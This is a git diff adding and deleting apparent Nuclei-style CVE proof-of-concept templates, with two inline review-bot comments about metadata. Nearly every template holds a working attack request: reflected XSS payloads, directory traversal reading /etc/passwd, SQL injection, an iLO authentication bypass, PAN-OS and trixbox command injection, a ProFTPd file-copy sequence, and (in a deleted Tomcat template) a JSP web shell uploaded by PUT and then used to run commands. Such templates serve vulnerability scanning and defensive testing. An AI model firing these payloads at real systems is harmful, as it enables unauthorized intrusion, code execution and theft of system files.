@@ -0,0 +1,35 @@ +id: CVE-2014-9606 +info: + name: Netsweeper 4.0.8 - Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-9606 + cwe-id: CWE-79 + tags: cve,cve2014,netsweeper,xss +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2014-9609-2437.yaml b/poc/cve/cve-2014-9609-2437.yaml new file mode 100644 index 0000000000..14e19e8e0e --- /dev/null +++ b/poc/cve/cve-2014-9609-2437.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2014-9609 + +info: + name: Netsweeper 4.0.8 - Directory Traversal + author: daffainfo + severity: medium + description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2014-9609 + cwe-id: CWE-22 + tags: cve,cve2014,netsweeper,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2015-0554-2456.yaml b/poc/cve/cve-2015-0554-2456.yaml deleted file mode 100644 index af65820b4d..0000000000 --- a/poc/cve/cve-2015-0554-2456.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2015-0554 -info: - name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure - author: daffainfo - severity: high - description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. - reference: - - https://www.exploit-db.com/exploits/35721 - - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - - http://www.exploit-db.com/exploits/35721 - classification: - cve-id: CVE-2015-0554 - tags: cve,cve2015,pirelli,router,disclosure -requests: - - method: GET - path: - - "{{BaseURL}}/wlsecurity.html" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var wpapskkey" - - "var WscDevPin" - - "var sessionkey" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2015-1880-2477.yaml b/poc/cve/cve-2015-1880-2477.yaml deleted file mode 100644 index 324c752a09..0000000000 --- a/poc/cve/cve-2015-1880-2477.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2015-1880 -info: - name: XSS in Fortigates SSL VPN login page - author: pikpikcu - severity: medium - description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://www.securityfocus.com/bid/74652 - classification: - cve-id: CVE-2015-1880 - tags: cve,cve2015,xss,fortigates,ssl -requests: - - method: GET - path: - - "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2015-2166.yaml b/poc/cve/cve-2015-2166.yaml deleted file mode 100644 index 143042641b..0000000000 --- a/poc/cve/cve-2015-2166.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2015-2166 - -info: - name: Ericsson Drutt MSDP - Local File Inclusion - author: daffainfo - severity: high - description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. - reference: - - https://www.exploit-db.com/exploits/36619 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ - classification: - cve-id: CVE-2015-2166 - tags: cve,cve2015,lfi,ericsson - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2015-3306-2502.yaml b/poc/cve/cve-2015-3306-2502.yaml deleted file mode 100644 index 7ac40dbb62..0000000000 --- a/poc/cve/cve-2015-3306-2502.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2015-3306 - -info: - name: ProFTPd RCE - author: pdteam - severity: high - reference: https://github.com/t0kx/exploit-CVE-2015-3306 - description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - classification: - cve-id: CVE-2015-3306 - tags: cve,cve2015,ftp,rce,network,proftpd - -network: - - inputs: - - data: "site cpfr /proc/self/cmdline\r\n" - read: 1024 - - data: "site cpto /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpfr /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpto /var/www/html/{{randstr}}\r\n" - - host: - - "{{Hostname}}" - - "{{Host}}:21" - - read-size: 1024 - matchers: - - type: word - part: raw - words: - - "Copy successful" 
diff --git a/poc/cve/cve-2015-4050.yaml b/poc/cve/cve-2015-4050.yaml deleted file mode 100644 index a56e9847ee..0000000000 --- a/poc/cve/cve-2015-4050.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-4050 - -info: - name: ESI unauthorized access - author: ELSFA7110,meme-lord - severity: high - description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. - tags: cve,cve2015,symfony,rce - reference: - - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 - -requests: - - method: GET - path: - - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Credits" - part: body - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2015-7780-2604.yaml b/poc/cve/cve-2015-7780-2604.yaml new file mode 100644 index 0000000000..789c902cf2 --- /dev/null +++ b/poc/cve/cve-2015-7780-2604.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2015-7780 +info: + name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + author: daffainfo + severity: medium + description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. + reference: + - https://www.exploit-db.com/exploits/35933 + - https://www.cvedetails.com/cve/CVE-2015-7780/ + - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html + - http://jvn.jp/en/jp/JVN21968837/index.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2015-7780 + cwe-id: CWE-22 + tags: cve,cve2015,lfi,manageengine +requests: + - method: GET + path: + - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + - type: word + part: header + words: + - "application/xml" diff --git a/poc/cve/cve-2016-1000128-2651.yaml b/poc/cve/cve-2016-1000128-2651.yaml deleted file mode 100644 index 61bfd4d41f..0000000000 --- a/poc/cve/cve-2016-1000128-2651.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2016-1000128 -info: - name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - - https://wordpress.org/plugins/anti-plagiarism - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000128 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000132-2669.yaml b/poc/cve/cve-2016-1000132-2669.yaml deleted file mode 100644 index df36a3068e..0000000000 --- a/poc/cve/cve-2016-1000132-2669.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2016-1000132 - -info: - name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - - https://wordpress.org/plugins/enhanced-tooltipglossary - - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000132 - cwe-id: CWE-79 - metadata: - google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000134-2678.yaml b/poc/cve/cve-2016-1000134-2678.yaml deleted file mode 100644 index d781de2ee0..0000000000 --- a/poc/cve/cve-2016-1000134-2678.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2016-1000134 - -info: - name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000134 - cwe-id: CWE-79 - metadata: - google-query: inurl:"/wp-content/plugins/hdw-tube" - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000143-2717.yaml b/poc/cve/cve-2016-1000143-2717.yaml deleted file mode 100644 index 3b67015203..0000000000 --- a/poc/cve/cve-2016-1000143-2717.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2016-1000143 -info: - name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - - https://wordpress.org/plugins/photoxhibit - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000143 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2016-1000154-2740.yaml b/poc/cve/cve-2016-1000154-2740.yaml new file mode 100644 index 0000000000..224b14f744 --- /dev/null +++ b/poc/cve/cve-2016-1000154-2740.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2016-1000154
+info:
+ name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin whizz v1.0.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=112
+ - https://wordpress.org/plugins/whizz
+ - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000154
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2016-10940-2757.yaml b/poc/cve/cve-2016-10940-2757.yaml
deleted file mode 100644
index 09a4757397..0000000000
--- a/poc/cve/cve-2016-10940-2757.yaml
+++ /dev/null
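Review bot: The `description` stops at "v1.0." while the `name` gives the affected range as "<= 1.0.7", so the two fields disagree on which versions are covered. I would align them, for example `description: Reflected XSS in the WordPress plugin WHIZZ 1.0.7 and earlier.`, so that triage does not read later 1.0.x installs as unaffected.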
@@ -1,45 +0,0 @@ -id: CVE-2016-10940 -info: - name: WordPress zm-gallery plugin 1.0 SQL Injection - author: cckuailong,daffainfo - severity: high - description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. - reference: - - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2016-10940 - cwe-id: CWE-89 - tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 - Host: {{Hostname}} - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 - Host: {{Hostname}} - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' - - 'contains(body_2, "[zm_gallery id=")' - - 'contains(body_2, "")' - - '!contains(body_3, "")' - condition: and - -# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml deleted file mode 100644 index 86c405ed7a..0000000000 --- a/poc/cve/cve-2016-6210.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2016-6210 - -info: - name: OpenSSH username enumeration < v7.3 - author: iamthefrogy,forgedhallpass - severity: medium - tags: network,openssh - description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. - reference: - - http://seclists.org/fulldisclosure/2016/Jul/51 - - https://security-tracker.debian.org/tracker/CVE-2016-6210 - - http://openwall.com/lists/oss-security/2016/08/01/2 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2016-6210 - cwe-id: CWE-200 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2016-7552-2812.yaml b/poc/cve/cve-2016-7552-2812.yaml deleted file mode 100644 index 140a337d54..0000000000 --- a/poc/cve/cve-2016-7552-2812.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2016-7552 -info: - name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass - author: dwisiswant0 - severity: critical - description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - reference: - - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://www.securityfocus.com/bid/97599 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-7552 - cwe-id: CWE-22 - tags: cve,cve2016,lfi,auth,bypass -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/logoff.cgi" - headers: - Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Memory map" - part: body - -# Enhanced by mp on 2022/05/10 diff --git a/poc/cve/cve-2017-12542-2884.yaml b/poc/cve/cve-2017-12542-2884.yaml new file mode 100644 index 0000000000..e6b40b0d91 --- /dev/null +++ b/poc/cve/cve-2017-12542-2884.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2017-12542
+
+info:
+ name: ILO4 Authentication bypass
+ author: pikpikcu
+ severity: critical
+ description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://www.exploit-db.com/exploits/44005
+ tags: cve,cve2017,ilo4,hpe
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2017-12542
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/rest/v1/AccountService/Accounts"
+ headers:
+ Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "iLO User"
+ part: body
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2017-12615.yaml b/poc/cve/cve-2017-12615.yaml
deleted file mode 100644
index da8f4861a7..0000000000
--- a/poc/cve/cve-2017-12615.yaml
+++ /dev/null
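Review bot: The `Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA` header carries the whole check, yet nothing in the template says why that value is sent; a comment above `headers:` such as `# over-long Connection value; a 200 JSON account listing without credentials indicates the bypass` would make it reviewable. The tags also omit `auth-bypass`, which cve-2017-5521-3027.yaml in this patch uses for the same class of finding, so I would write `tags: cve,cve2017,ilo4,hpe,auth-bypass`, and `classification` has no `cwe-id`. A match means the response listed iLO accounts, so scan output for this template should be stored as sensitive data.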
@@ -1,70 +0,0 @@ -id: CVE-2017-12615 - -info: - name: Apache Tomcat Servers - Remote Code Execution - author: pikpikcu - severity: high - description: | - Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. - remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. - reference: - - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 - - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E - - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12615 - - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2017-12615 - cwe-id: CWE-434 - epss-score: 0.96923 - epss-percentile: 0.9965 - cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: tomcat - shodan-query: title:"Apache Tomcat" - tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive - -http: - - method: PUT - path: - - "{{BaseURL}}/poc.jsp/" - - body: | - <%@ page import="java.util.*,java.io.*"%> - <% - if (request.getParameter("cmd") != null) { - out.println("Command: " + request.getParameter("cmd") + "
"); - Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); - OutputStream os = p.getOutputStream(); - InputStream in = p.getInputStream(); - DataInputStream dis = new DataInputStream(in); - String disr = dis.readLine(); - while ( disr != null ) { - out.println(disr); - disr = dis.readLine(); - } - } - %> - - headers: - Content-Type: application/x-www-form-urlencoded - - - method: GET - path: - - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100edc9250058f3f884a3fef19576fe38659fad0a56a0087578ca251c8334aaa6550220204df971b738b9fabb312f64dffe19c1990977b41b333502f73de2b148004738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-14535-2928.yaml b/poc/cve/cve-2017-14535-2928.yaml deleted file mode 100644 index 8cc11f11f1..0000000000 --- a/poc/cve/cve-2017-14535-2928.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability - author: pikpikcu - severity: high - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-15647-2955.yaml b/poc/cve/cve-2017-15647-2955.yaml deleted file mode 100644 index b6d671f5a6..0000000000 --- a/poc/cve/cve-2017-15647-2955.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2017-15647 -info: - name: FiberHome - Directory Traversal - author: daffainfo - severity: high - description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - - https://blogs.securiteam.com/index.php/archives/3472 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - tags: cve,cve2017,lfi,router -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-15944-2965.yaml b/poc/cve/cve-2017-15944-2965.yaml new file mode 100644 index 0000000000..f69b9b9ad5 --- /dev/null +++ b/poc/cve/cve-2017-15944-2965.yaml 
@@ -0,0 +1,33 @@
+id: CVE-2017-15944
+info:
+ name: Palo Alto Network PAN-OS - Remote Code Execution
+ author: emadshanab,milo2012
+ severity: critical
+ description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
+ reference:
+ - https://www.exploit-db.com/exploits/43342
+ - https://security.paloaltonetworks.com/CVE-2017-15944
+ - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15944
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2017-15944
+ tags: cve,cve2017,rce,vpn,panos,globalprotect
+requests:
+ - raw:
+ - |
+ GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: PHPSESSID={{randstr}};
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "@start@Success@end@"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/cve-2017-17451-2983.yaml b/poc/cve/cve-2017-17451-2983.yaml
deleted file mode 100644
index 0ce0fc0daf..0000000000
--- a/poc/cve/cve-2017-17451-2983.yaml
+++ /dev/null
